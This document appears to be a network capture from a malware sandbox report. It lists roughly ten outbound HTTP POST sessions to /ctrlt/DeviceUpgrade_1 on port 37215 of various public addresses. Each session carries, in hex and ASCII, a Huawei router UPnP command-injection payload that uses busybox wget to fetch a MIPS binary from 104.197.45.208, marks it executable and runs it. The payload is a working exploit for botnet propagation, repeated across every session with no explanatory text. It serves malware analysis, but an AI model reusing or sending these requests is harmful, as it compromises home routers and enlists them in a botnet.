                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            67192.168.2.1441208197.244.221.11037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662345886 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            68192.168.2.146011241.68.4.24737215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662368059 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            69192.168.2.1453058156.173.40.17237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662386894 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            70192.168.2.1454522156.231.88.2537215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662414074 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            71192.168.2.144319641.83.251.19737215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662437916 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            72192.168.2.1447124197.106.253.2637215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662475109 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            73192.168.2.143794641.150.152.4037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662476063 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            74192.168.2.145895041.73.147.20237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662560940 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            75192.168.2.145615241.137.12.9837215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662564993 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            76192.168.2.1453572156.251.163.1837215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662590027 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
